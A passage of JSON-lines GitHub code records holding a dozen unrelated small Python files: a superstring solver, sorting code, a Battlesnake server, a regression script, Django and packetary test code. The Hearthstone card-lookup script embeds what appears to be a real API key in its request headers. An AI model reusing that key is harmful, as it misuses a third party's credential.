add_substring(string, substring)) for substring in substrings]\n #Sort in order of length \n substring_tries = sorted(substring_tries, key=lambda x: len(x[1]))\n #string is too long. At sometime we will have to add this substring!\n if not substring_tries or len(substring_tries[-1][1]) >= best_string_length:\n return\n #DFS search\n while substring_tries:\n substring = substring_tries[0]\n substring_tries.remove(substring)\n substrings.remove(substring[0])\n complete_DFS(substring[1], substrings, search_time)\n substrings.append(substring[0])\ndef local_search(substrings, iterations=1000, search_time=10, print_string=True):\n global best_string\n global best_string_length\n global ticks\n num_substrings = len(substrings)\n current_permutation = range(num_substrings)\n while(True):\n current_permutation = random.sample(current_permutation, num_substrings)\n for _ in range(iterations):\n ticks += 1\n if ticks == ticks_max:\n current_time = time.time()\n if current_time - starting_time > search_time:\n if print_string == True:\n output_best()\n ticks = 0\n return\n ticks = 0\n random_choice = random.randrange(2)\n #Random move\n if random_choice == 0:\n swap_number = random.randrange(0, num_substrings - 1)\n current_permutation = swap_permutation(current_permutation, swap_number)\n else:\n permutation_swaps = [None for _ in range(num_substrings - 1)]\n new_strings = [None for _ in range(num_substrings - 1)]\n for num in range(num_substrings - 1):\n permutation_swaps[num] = swap_permutation(current_permutation, num)\n new_strings[num] = permutation_string(current_permutation, substrings)\n permutation_lengths = [len(swap) for swap in new_strings]\n min_index = permutation_lengths.index(min(permutation_lengths))\n current_permutation = swap_permutation(current_permutation, min_index)\n new_string = permutation_string(current_permutation, substrings)\n if len(new_string) < best_string_length:\n best_string = new_string\n best_string_length = len(new_string)\n\n\n\n#Outputs best 
string found so far and exits program\ndef output_best():\n print(\"Best sequence found: \", best_string)\n print(\"Sequence Length: \", best_string_length)\n sys.exit()\n\n#Read input and run DFS on subsequences\ndef main():\n global starting_time\n filename = sys.argv[1]\n with open(filename) as f:\n _ = int(f.readline())\n _ = int(f.readline())\n subsequences = []\n sequence = None\n while(sequence != ''):\n sequence = f.readline()\n if sequence != '':\n #Drop newline\n subsequences.append(sequence[:-1])\n\n starting_time = time.time()\n local_search(subsequences, search_time=5, print_string=False)\n starting_time = time.time()\n complete_DFS('', subsequences, search_time=5)\n output_best() \nif __name__ == '__main__':\n main()","repo_name":"gnbpdx/AI-ML","sub_path":"superseq.py","file_name":"superseq.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72454057500","text":"n = int(input())\nlis = input().split()\nlis2 = input().split()\n\nx = 0\ny = 0\n\nfor i in range(n):\n a = lis[i]\n b = lis2[i]\n if a == \"rock\":\n if b == \"paper\":\n y += 1\n elif b == \"scissors\":\n x += 1\n \n elif a == \"paper\":\n if b == \"rock\":\n x += 1\n elif b == \"scissors\":\n y += 1\n \n else:\n if b == \"rock\":\n y += 1\n elif b == \"paper\":\n x += 1\nprint(x, y)","repo_name":"AlanBui1/Competitive-Programming-Solutions","sub_path":"hkccc15j1.py","file_name":"hkccc15j1.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71450327580","text":"from django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\n\nfrom supergood_reads.models import UserSettings\n\n\nclass Command(BaseCommand):\n help = \"Create UserSettings for existing users\"\n\n def handle(self, *args, **kwargs):\n user_model = get_user_model()\n\n user_ids_with_settings = UserSettings.objects.values_list(\"user_id\", flat=True)\n users_without_settings = user_model.objects.exclude(\n id__in=user_ids_with_settings\n )\n\n new_user_settings = []\n for user in users_without_settings:\n new_user_settings.append(UserSettings(user=user))\n UserSettings.objects.bulk_create(new_user_settings)\n\n created_count = len(new_user_settings)\n self.stdout.write(\n self.style.SUCCESS(f\"Total UserSettings created: {created_count}\")\n )\n","repo_name":"supergood-org/supergood-reads","sub_path":"supergood_reads/management/commands/supergood_reads_create_user_settings.py","file_name":"supergood_reads_create_user_settings.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17584765820","text":"#!/usr/bin/python3\n\n# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=missing-function-docstring\n\nimport pymedia_redis\nimport pymedia_display\n\nfrom pymedia_const import REDIS_SERVER, REDIS_PORT, REDIS_DB\n\n# ---------------------\n\nif __name__ == '__main__':\n\n _redis = pymedia_redis.RedisHelper(REDIS_SERVER, REDIS_PORT, REDIS_DB,\n 'DISPLAY')\n\n display = pymedia_display.Display(_redis, pubsubs=(\n 'PLAYER:EVENT',\n 'CDSP:EVENT',\n ))\n\n display.t_wait_events.start()\n\n try:\n display.t_wait_events.join()\n except KeyboardInterrupt:\n print(\"Received KeyboardInterrupt, shutting down...\")\n display.blank()\n","repo_name":"taradiddles/diy-dsp-preamp","sub_path":"pymedia/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"69986427099","text":"import json\r\nfrom pprint import pprint\r\nimport requests\r\n\r\nprint(\"¿Que quieres?\")\r\nprint(\"Buscar una carta\")\r\nprint(\"Buscar varias\")\r\nopcion=int(input(\"¿Que quieres?\"))\r\n\r\nif opcion==1:\r\n carta=input(\"Introduzca el nombre\")\r\n response = requests.get(\"https://omgvamp-hearthstone-v1.p.mashape.com/cards/\"+carta,\r\n headers={\r\n \"X-Mashape-Key\": \"RdEHCET0tBmshzcVxojLE997hAvNp1qWbaQjsn2UdJz0ad4JQA\",\r\n \"Accept\": \"application/json\"\r\n }\r\n)\r\n data=response.json()\r\n for carta in data:\r\n if carta[\"collectible\"]==True:\r\n print(\"Nombre:\",carta[\"name\"])\r\n print(\"Vida:\",carta[\"health\"])\r\n print(\"Ataque:\",carta[\"attack\"])\r\n\r\nelse:\r\n print(\"Nada\")\r\n\r\n\r\n\r\nexpansion=\"¿Que expansion deseas buscar?\"\r\n\r\nresponse = requests.get(\"https://omgvamp-hearthstone-v1.p.mashape.com/cards/sets/\"+expansion,\r\n headers={\r\n \"X-Mashape-Key\": \"RdEHCET0tBmshzcVxojLE997hAvNp1qWbaQjsn2UdJz0ad4JQA\"\r\n }\r\n)\r\ndata=response.json()\r\n\r\nfor carta in data:\r\n\tif carta[\"type\"]==\"Hero\":\r\n\t\tprint (carta[\"name\"])\r\n","repo_name":"Alexlp1092/ProyectoWeb","sub_path":"pruebashearthstone.py","file_name":"pruebashearthstone.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10966523776","text":"from .bitonic_loops import bitonic_layer_loop, bitonic_swap_loop\n\ntry:\n # try to use autoray to provide transparent JAX/autograd support\n from autoray import numpy as np\nexcept ModuleNotFoundError:\n print(\"No autoray, using numpy (note: grad won't work!)\")\n import numpy as np\n\n\n### Softmax (log-sum-exp)\ndef softmax(a, b, alpha=1, normalize=0):\n \"\"\"The softmaximum of softmax(a,b) = log(e^a + a^b).\n normalize should be zero if a or b could be negative and can be 1.0 (more accurate)\n if a and b are strictly positive.\n Also called \\alpha-quasimax: \n J. Cook. Basic properties of the soft maximum. \n Working Paper Series 70, UT MD Anderson CancerCenter Department of Biostatistics, \n 2011. http://biostats.bepress.com/mdandersonbiostat/paper7\n \"\"\"\n return np.log(np.exp(a * alpha) + np.exp(b * alpha) - normalize) / alpha\n\n\n### Smooth max\ndef smoothmax(a, b, alpha=1):\n return (a * np.exp(a * alpha) + b * np.exp(b * alpha)) / (\n np.exp(a * alpha) + np.exp(b * alpha)\n )\n\n\n### relaxed softmax\ndef softmax_smooth(a, b, smooth=0):\n \"\"\"The smoothed softmaximum of softmax(a,b) = log(e^a + a^b).\n With smooth=0.0, is softmax; with smooth=1.0, averages a and b\"\"\"\n t = smooth / 2.0\n return np.log(np.exp((1 - t) * a + b * t) + np.exp((1 - t) * b + t * a)) - np.log(\n 1 + smooth\n )\n\n\ndef bitonic_matrices(n):\n \"\"\"Compute a set of bitonic sort matrices to sort a sequence of\n length n. n *must* be a power of 2.\n \n See: https://en.wikipedia.org/wiki/Bitonic_sorter\n \n Set k=log2(n).\n There will be k \"layers\", i=1, 2, ... k\n \n Each ith layer will have i sub-steps, so there are (k*(k+1)) / 2 sorting steps total.\n \n For each step, we compute 4 matrices. l and r are binary matrices of size (k/2, k) and\n map_l and map_r are matrices of size (k, k/2).\n \n l and r \"interleave\" the inputs into two k/2 size vectors. map_l and map_r \"uninterleave\" these two k/2 vectors\n back into two k sized vectors that can be summed to get the correct output.\n \n The result is such that to apply any layer's sorting, we can perform:\n \n l, r, map_l, map_r = layer[j]\n a, b = l @ y, r @ y \n permuted = map_l @ np.minimum(a, b) + map_r @ np.maximum(a,b)\n \n Applying this operation for each layer in sequence sorts the input vector.\n \n \"\"\"\n # number of outer layers\n\n matrices = []\n for n, m, layer in bitonic_layer_loop(n):\n l, r = np.zeros((n // 2, n)), np.zeros((n // 2, n))\n map_l, map_r = np.zeros((n, n // 2)), np.zeros((n, n // 2))\n for a, b, out, swap in bitonic_swap_loop(n, m, layer):\n l[out, a] = 1\n r[out, b] = 1\n if swap:\n a, b = b, a\n map_l[a, out] = 1\n map_r[b, out] = 1\n matrices.append((l, r, map_l, map_r))\n return matrices\n\n\ndef bitonic_indices(n):\n \"\"\"Compute a set of bitonic sort indices to sort a sequence of\n length n. n *must* be a power of 2. 
def bitonic_indices(n):\n    \"\"\"Compute a set of bitonic sort indices to sort a sequence of\n    length n. n *must* be a power of 2. As opposed to the matrix\n    operations, this requires only two index vectors of length n\n    for each layer of the network.\n    \"\"\"\n    # number of outer layers\n    layers = int(np.log2(n))\n    indices = []\n    for n, m, layer in bitonic_layer_loop(n):\n        weave = np.zeros(n, dtype=\"i4\")\n        unweave = np.zeros(n, dtype=\"i4\")\n        for a, b, out, swap in bitonic_swap_loop(n, m, layer):\n            weave[out] = a\n            weave[out + n // 2] = b\n            if swap:\n                a, b = b, a\n            unweave[a] = out\n            unweave[b] = out + n // 2\n        indices.append((weave, unweave))\n    return indices\n\n\ndef bitonic_woven_matrices(n):\n    \"\"\"\n    Combine the l,r and l_inv, r_inv matrices into single n x n multiplies, for\n    use with bisort_weave/diff_bisort_weave, fusing together consecutive stages.\n    This reduces the number of multiplies to (k)(k+1) + 1 multiplies, where k=np.log2(n)\n    \"\"\"\n    layers = int(np.log2(n))\n    matrices = []\n    last_unweave = np.eye(n)\n    for n, m, layer in bitonic_layer_loop(n):\n        weave, unweave = np.zeros((n, n)), np.zeros((n, n))\n        for a, b, out, swap in bitonic_swap_loop(n, m, layer):\n            weave[out, a] = 1\n            weave[out + n // 2, b] = 1\n            # flip comparison order as needed\n            if swap:\n                a, b = b, a\n            unweave[a, out] = 1\n            unweave[b, out + n // 2] = 1\n        # fuse the unweave and weave steps\n        matrices.append(weave @ last_unweave)\n        last_unweave = unweave\n    # make sure the last unweave is preserved\n    matrices.append(last_unweave)\n    return matrices\n\n\ndef diff_sort(matrices, x, softmax=softmax):\n    \"\"\"\n    Approximate differentiable sort. Takes a set of bitonic sort matrices generated by bitonic_matrices(n) and sorts\n    a sequence x of length n. Values may be distorted slightly but will be ordered.\n    \"\"\"\n    for l, r, map_l, map_r in matrices:\n        a, b = l @ x, r @ x\n        mx = softmax(a, b)\n        mn = a + b - mx\n        x = map_l @ mn + map_r @ mx\n\n    return x\n\n\ndef diff_sort_indexed(indices, x, softmax=softmax):\n    \"\"\"\n    Given a set of bitonic sort indices generated by bitonic_indices(n), sort\n    a sequence x of length n.\n    \"\"\"\n    split = len(x) // 2\n    for weave, unweave in indices:\n        woven = x[weave]\n        a, b = woven[:split], woven[split:]\n        mx = softmax(a, b)\n        mn = a + b - mx\n        x = np.concatenate([mn, mx])[unweave]\n    return x\n\n\ndef comparison_sort(matrices, x, compare_fn, alpha=1, scale=250):\n    \"\"\"\n    Sort a tensor X, applying a differentiable comparison function \"compare_fn\"\n    while sorting. Uses softmax to weight components of the matrix.\n\n    Parameters:\n    ------------\n    matrices: the nxn bitonic sort matrices created by bitonic_matrices\n    X: an [n,...] tensor of elements\n    compare_fn: a differentiable comparison function compare_fn(a,b)\n    taking a pair of [n//2,...] tensors and returning a signed [n//2] vector.\n    alpha=1.0: smoothing to apply; smaller alpha=smoother, less accurate sorting,\n    larger=harder max, increased numerical instability\n    scale=250: scaling applied to output of compare_fn. Default is useful for\n    comparison functions returning values in the range ~[-1, 1]\n\n    Returns:\n    ----------\n    X_sorted: [n,...] 
tensor (approximately) sorted according to compare_fn\n\n    \"\"\"\n    for l, r, map_l, map_r in matrices:\n        score = compare_fn((x.T @ l.T).T, (x.T @ r.T).T)\n        a, b = score*scale, score*-scale\n        a_weight = np.exp(a * alpha) / (np.exp(a * alpha) + np.exp(b * alpha))\n        b_weight = 1 - a_weight\n        # apply weighting to the full vectors\n        aX = x.T @ l.T\n        bX = x.T @ r.T\n        w_max = (a_weight * aX + b_weight * bX)\n        w_min = (b_weight * aX + a_weight * bX)\n        # recombine into the full vector\n        x = (w_max @ map_l.T) + (w_min @ map_r.T)\n        x = x.T\n\n    return x\n\n\ndef vector_sort(matrices, X, key, alpha=1):\n    \"\"\"\n    Sort a matrix X, applying a differentiable function \"key\" to each vector\n    while sorting. Uses softmax to weight components of the matrix.\n\n    For example, selecting the nth element of each vector by\n    multiplying with a one-hot vector.\n\n    Parameters:\n    ------------\n    matrices: the nxn bitonic sort matrices created by bitonic_matrices\n    X: an [n,d] matrix of elements\n    key: a function taking a d-element vector and returning a scalar\n    alpha=1.0: smoothing to apply; smaller alpha=smoother, less accurate sorting,\n    larger=harder max, increased numerical instability\n\n    Returns:\n    ----------\n    X_sorted: [n,d] matrix (approximately) sorted according to \n\n    \"\"\"\n    for l, r, map_l, map_r in matrices:\n\n        x = key(X)\n        # compute weighting on the scalar function\n        a, b = l @ x, r @ x\n        a_weight = np.exp(a * alpha) / (np.exp(a * alpha) + np.exp(b * alpha))\n        b_weight = 1 - a_weight\n        # apply weighting to the full vectors\n        aX = l @ X\n        bX = r @ X\n        w_max = (a_weight * aX.T + b_weight * bX.T).T\n        w_min = (b_weight * aX.T + a_weight * bX.T).T\n        # recombine into the full vector\n        X = (map_l @ w_max) + (map_r @ w_min)\n    return X\n\n\ndef diff_sort_weave(fused, x, softmax=softmax, beta=0.0):\n    \"\"\"\n    Given a set of bitonic sort matrices generated by bitonic_woven_matrices(n), sort\n    a sequence x of length n.\n    beta specifies interpolation between true permutations (beta=0.0) and\n    leaving the values unchanged (beta=1.0)\n    \"\"\"\n    i = np.eye(len(x))\n    split = len(x) // 2\n    x = ((beta * i) + (1 - beta) * fused[0]) @ x\n    for mat in fused[1:]:\n        a, b = x[:split], x[split:]\n        mx = softmax(a, b)\n        mn = a + b - mx\n        x = (beta * i + (1 - beta) * mat) @ np.concatenate([mn, mx])\n    return x\n\n\n### differentiable ranking\ndef order_matrix(original, sortd, sigma=0.1):\n    \"\"\"Apply a simple RBF kernel to the difference between original and sortd,\n    with the kernel width set by sigma. Normalise each row to sum to 1.0.\"\"\"\n    diff = ((original).reshape(-1, 1) - sortd.reshape(1, -1)) ** 2\n    rbf = np.exp(-(diff) / (2 * sigma ** 2))\n    return (rbf.T / np.sum(rbf, axis=1)).T\n\n\ndef dargsort(original, sortd, sigma, transpose=False):\n    \"\"\"Take an input vector `original` and a sorted vector `sortd`\n    along with an RBF kernel width `sigma`, return an approximate ranking.\n    If transpose is True, returns approximate argsort (but note that ties have identical values)\n    If transpose is False (default), returns ranking\"\"\"\n    order = order_matrix(original, sortd, sigma=sigma)\n    if transpose:\n        order = order.T\n    return order @ np.arange(len(original))\n\n\ndef diff_argsort(matrices, x, sigma=0.1, softmax=softmax, transpose=False):\n\n    \"\"\"Return the smoothed, differentiable ranking of each element of x. Sigma\n    specifies the smoothing of the ranking. 
Note that this function is deceptively named,\n and in the default setting returns the *ranking*, not the argsort.\n \n If transpose is True, returns argsort (but note that ties are not broken in differentiable\n argsort);\n If False, returns ranking (likewise, ties are not broken).\n \"\"\"\n sortd = diff_sort(matrices, x, softmax)\n return dargsort(x, sortd, sigma, transpose)\n\n\ndef diff_argsort_indexed(indices, x, sigma=0.1, softmax=softmax, transpose=False):\n \"\"\"Return the smoothed, differentiable ranking of each element of x. Sigma\n specifies the smoothing of the ranking. Uses the indexed form\n to avoid multiplies.\n \n If transpose is True, returns argsort (but note that ties are not broken in differentiable\n argsort);\n If False, returns ranking (likewise, ties are not broken).\n \"\"\"\n sortd = diff_sort_indexed(indices, x, softmax)\n return dargsort(x, sortd, sigma, transpose)\n","repo_name":"johnhw/differentiable_sorting","sub_path":"differentiable_sorting/differentiable_sorting.py","file_name":"differentiable_sorting.py","file_ext":"py","file_size_in_byte":11209,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"69"}
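The `diff_sort` family above never calls a hard `max`: each compare-and-swap computes a smooth maximum `mx = softmax(a, b)` and recovers the matching smooth minimum as `mn = a + b - mx`, which keeps every stage differentiable while preserving the pairwise sum exactly. The module-level `softmax` default is not shown in this excerpt, so the sketch below assumes a logsumexp-style smooth maximum; the sharpness parameter `alpha` is also an assumption.

```python
import numpy as np

def smooth_max(a, b, alpha=10.0):
    # Differentiable elementwise approximation of max(a, b);
    # larger alpha pushes it closer to the hard maximum.
    return np.logaddexp(alpha * a, alpha * b) / alpha

a = np.array([1.0, 5.0, 2.0])
b = np.array([4.0, 3.0, 2.5])
mx = smooth_max(a, b)   # close to np.maximum(a, b)
mn = a + b - mx         # close to np.minimum(a, b)
assert np.allclose(mx + mn, a + b)  # the pairwise sum is preserved exactly
```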
+{"seq_id":"36927937047","text":"import os\nimport random\n\nimport cherrypy\n\n\"\"\"\nThis is a simple Battlesnake server written in Python.\nFor instructions see https://github.com/BattlesnakeOfficial/starter-snake-python/README.md\n\"\"\"\n\n\nclass Battlesnake(object):\n @cherrypy.expose\n @cherrypy.tools.json_out()\n def index(self):\n # This function is called when you register your Battlesnake on play.battlesnake.com\n # It controls your Battlesnake appearance and author permissions.\n # TIP: If you open your Battlesnake URL in browser you should see this data\n return {\n \"apiversion\": \"1\",\n \"author\": \"Mandeep Dalavi\", # TODO: Your Battlesnake Username\n \"color\": \"#CF9FFF\", # TODO: Personalize\n \"head\": \"beluga\", # TODO: Personalize\n \"tail\": \"curled\", # TODO: Personalize\n }\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n def start(self):\n # This function is called everytime your snake is entered into a game.\n # cherrypy.request.json contains information about the game that's about to be played.\n data = cherrypy.request.json\n\n print(\"START\")\n return \"ok\"\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n @cherrypy.tools.json_out()\n def move(self):\n # This function is called on every turn of a game. It's how your snake decides where to move.\n # Valid moves are \"up\", \"down\", \"left\", or \"right\".\n # TODO: Use the information in cherrypy.request.json to decide your next move.\n data = cherrypy.request.json\n body = data[\"you\"][\"body\"]\n\n # Choose a random direction to move in\n possible_moves = [\"up\", \"down\", \"left\", \"right\"]\n safe_moves = self.getSafeMoves(possible_moves, body, data[\"board\"])\n\n if safe_moves:\n move = random.choice(safe_moves)\n return {\"move\" : move}\n\n return {\"move\" : 'up'}\n\n def getNext(self, currentHead, nextMove):\n futureHead = currentHead.copy()\n if nextMove == 'left':\n futureHead['x'] = currentHead['x'] - 1\n if nextMove == 'right':\n futureHead['x'] = currentHead['x'] + 1\n if nextMove == 'up':\n futureHead['y'] = currentHead['y'] + 1\n if nextMove == 'down':\n futureHead['y'] = currentHead['y'] - 1\n return futureHead\n \n def getSafeMoves(self, possible_moves, body, board):\n safe_moves = []\n\n for guess in possible_moves:\n # check if we make this move, will the decisions\n guessCoord = self.getNext(body[0], guess)\n if self.avoidWalls(guessCoord, board[\"width\"], board[\"height\"]) and self.avoidSnakes(guessCoord, board[\"snakes\"]):\n safe_moves.append(guess)\n elif len(body)>1 and guessCoord == body[-1] and guess not in body[:-1]:\n safe_moves.append(guess)\n return safe_moves\n\n def avoidWalls(self, futureHead, width, height):\n result = True\n x = int(futureHead['x'])\n y = int(futureHead['y'])\n\n if x < 0 or y < 0 or x >= width or y >= height:\n result = False\n\n return result\n\n def avoidSnakes(self, futureHead, snakeBodies):\n for snake in snakeBodies:\n if futureHead in snake[\"body\"][:-1]:\n return False\n return True\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n def end(self):\n # This function is called when a game your snake was in ends.\n # It's purely for informational purposes, you don't have to make any decisions here.\n data = cherrypy.request.json\n\n print(\"END\")\n return \"ok\"\n\n\nif __name__ == \"__main__\":\n server = Battlesnake()\n cherrypy.config.update({\"server.socket_host\": \"0.0.0.0\"})\n cherrypy.config.update(\n {\"server.socket_port\": int(os.environ.get(\"PORT\", \"8080\")),}\n )\n print(\"Starting Battlesnake Server...\")\n 
cherrypy.quickstart(server)\n","repo_name":"MandeepDalavi/Battlesnake","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"42053043533","text":"X,Y=map(int,input().split())\r\nN=int(input())\r\nL=[]\r\nfor i in range(N):\r\n L.append([int(x) for x in input().split()])\r\nMin=2147483647\r\nA,B=0,0\r\nfor i in L:\r\n if Min>abs(X-i[0])**2+abs(Y-i[1])**2:\r\n Min=abs(X-i[0])**2+abs(Y-i[1])**2\r\n A,B=i[0],i[1]\r\nprint(A,B)\r\n","repo_name":"Benson0418/python_t2","sub_path":"h658.py","file_name":"h658.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21572513331","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn import linear_model\r\n\r\ndf = pd.read_csv('honeyproduction.csv')\r\n\r\nprod_per_year = df.groupby('year').totalprod.mean().reset_index()\r\nX = prod_per_year['year']\r\nX = X.values.reshape(-1, 1)\r\ny = prod_per_year['totalprod']\r\n\r\nregr = linear_model.LinearRegression()\r\nregr.fit(X, y)\r\ny_predict = regr.predict(X)\r\n\r\nX_future = np.array(range(2013, 2050))\r\nX_future = X_future.reshape(-1, 1)\r\nfuture_predict = regr.predict(X_future)\r\n\r\nplt.scatter(X, y)\r\nplt.plot(X, y_predict)\r\nplt.plot(X_future, future_predict)\r\nplt.savefig('honey_future.png')\r\nplt.show()\r\n\r\nprint(df.head())\r\nprint(regr.coef_)\r\nprint(regr.intercept_)\r\n","repo_name":"johnchae/honey-linear-regression","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8050803192","text":"\ndef merge(arr, left, mid, right): \n\tn1 = mid - left + 1\n\tn2 = right- mid \n\n\tLeftArray = [0] * (n1) \n\tRightArray = [0] * (n2) \n\n\tfor i in range(0 , n1): \n\t\tLeftArray[i] = arr[left + i] \n\n\tfor j in range(0 , n2): \n\t\tRightArray[j] = arr[mid + 1 + j]\n \n\ti = 0\n\tj = 0\n\tk = left\t \n\n\twhile i < n1 and j < n2 : \n\t\tif LeftArray[i] <= RightArray[j]: \n\t\t\tarr[k] = LeftArray[i] \n\t\t\ti += 1\n\t\telse: \n\t\t\tarr[k] = RightArray[j] \n\t\t\tj += 1\n\t\tk += 1\n\twhile i < n1: \n\t\tarr[k] = LeftArray[i] \n\t\ti += 1\n\t\tk += 1\n\n\twhile j < n2: \n\t\tarr[k] = RightArray[j] \n\t\tj += 1\n\t\tk += 1\n \ndef mergeSort(arr,left,right): \n\tif left < right: \n\t\tmid = (left+right)//2\n\n\t\tmergeSort(arr, left, mid) \n\t\tmergeSort(arr, mid+1, right) \n\t\tmerge(arr, left, mid, right) \n\narr=[3,1,235,5,56,32,33,21,1]\nmergeSort(arr,0,len(arr)-1)\nprint(arr)\n\n\n\n","repo_name":"samirpatil2000/Data-Struture-Algo","sub_path":"C_&C++/c/array/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"38202101352","text":"import six\n\nfrom packetary.objects.index import Index\n\nfrom packetary import objects\nfrom packetary.tests import base\nfrom packetary.tests.stubs.generator import gen_package\nfrom packetary.tests.stubs.generator import gen_relation\n\n\nclass TestIndex(base.TestCase):\n def test_add(self):\n index = Index()\n index.add(gen_package(version=1))\n self.assertIn(\"package1\", index.packages)\n self.assertIn(1, index.packages[\"package1\"])\n self.assertIn(\"obsoletes1\", index.obsoletes)\n self.assertIn(\"provides1\", index.provides)\n\n index.add(gen_package(version=2))\n self.assertEqual(1, len(index.packages))\n self.assertIn(1, index.packages[\"package1\"])\n self.assertIn(2, index.packages[\"package1\"])\n self.assertEqual(1, len(index.obsoletes))\n self.assertEqual(1, len(index.provides))\n\n def test_find(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n\n self.assertIs(\n p1,\n index.find(\"package1\", objects.VersionRange(\"eq\", 1))\n )\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange())\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_find_all(self):\n index = Index()\n p11 = gen_package(idx=1, version=1)\n p12 = gen_package(idx=1, version=2)\n p21 = gen_package(idx=2, version=1)\n p22 = gen_package(idx=2, version=2)\n index.add(p11)\n index.add(p12)\n index.add(p21)\n index.add(p22)\n\n self.assertItemsEqual(\n [p11, p12],\n index.find_all(\"package1\", objects.VersionRange())\n )\n self.assertItemsEqual(\n [p21, p22],\n index.find_all(\"package2\", objects.VersionRange(\"le\", 2))\n )\n\n def test_find_newest_package(self):\n index = Index()\n p1 = gen_package(idx=1, version=2)\n p2 = gen_package(idx=2, version=2)\n p2.obsoletes.append(\n gen_relation(p1.name, [\"lt\", p1.version])\n )\n index.add(p1)\n index.add(p2)\n\n self.assertIs(\n p1, index.find(p1.name, objects.VersionRange(\"eq\", p1.version))\n )\n self.assertIs(\n p2, index.find(p1.name, objects.VersionRange(\"eq\", 1))\n )\n\n def test_find_top_down(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange(\"le\", 2))\n )\n self.assertIs(\n p1,\n index.find(\"package1\", objects.VersionRange(\"lt\", 2))\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"lt\", 1))\n )\n\n def test_find_down_up(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange(\"ge\", 2))\n )\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange(\"gt\", 1))\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_find_accurate(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n self.assertIs(\n p1,\n index.find(\"package1\", objects.VersionRange(\"eq\", 1))\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"eq\", 3))\n )\n\n def test_find_obsolete(self):\n index = Index()\n p1 = gen_package(version=1)\n index.add(p1)\n\n self.assertIs(\n p1, index.find(\"obsoletes1\", objects.VersionRange(\"le\", 2))\n )\n self.assertIsNone(\n index.find(\"obsoletes1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_find_provides(self):\n index = 
Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n\n self.assertIs(\n p2, index.find(\"provides1\", objects.VersionRange(\"ge\", 2))\n )\n self.assertIsNone(\n index.find(\"provides1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_len(self):\n index = Index()\n for i in six.moves.range(3):\n index.add(gen_package(idx=i + 1))\n self.assertEqual(3, len(index))\n\n for i in six.moves.range(3):\n index.add(gen_package(idx=i + 1, version=2))\n self.assertEqual(6, len(index))\n self.assertEqual(3, len(index.packages))\n\n for i in six.moves.range(3):\n index.add(gen_package(idx=i + 1, version=2))\n self.assertEqual(6, len(index))\n self.assertEqual(3, len(index.packages))\n","repo_name":"HuongNT-CloudNFV/fuel-mirror","sub_path":"packetary/tests/test_index.py","file_name":"test_index.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
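The tests above exercise an `Index` keyed by package name plus a `VersionRange(op, edge)` predicate with operators `eq`, `lt`, `le`, `gt`, `ge`, where an argument-free range matches any version. Packetary's real `VersionRange` is not shown here; the following stand-in (class and method names are hypothetical) only illustrates the matching semantics the assertions rely on:

```python
import operator

_OPS = {"lt": operator.lt, "le": operator.le, "eq": operator.eq,
        "ge": operator.ge, "gt": operator.gt}

class VersionRangeSketch:
    """No-argument construction matches every version; otherwise a
    single comparison operator is applied against an edge value."""
    def __init__(self, op=None, edge=None):
        self.op, self.edge = op, edge

    def matches(self, version):
        return True if self.op is None else _OPS[self.op](version, self.edge)

assert VersionRangeSketch().matches(1)
assert VersionRangeSketch("eq", 1).matches(1)
assert not VersionRangeSketch("gt", 2).matches(2)
```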
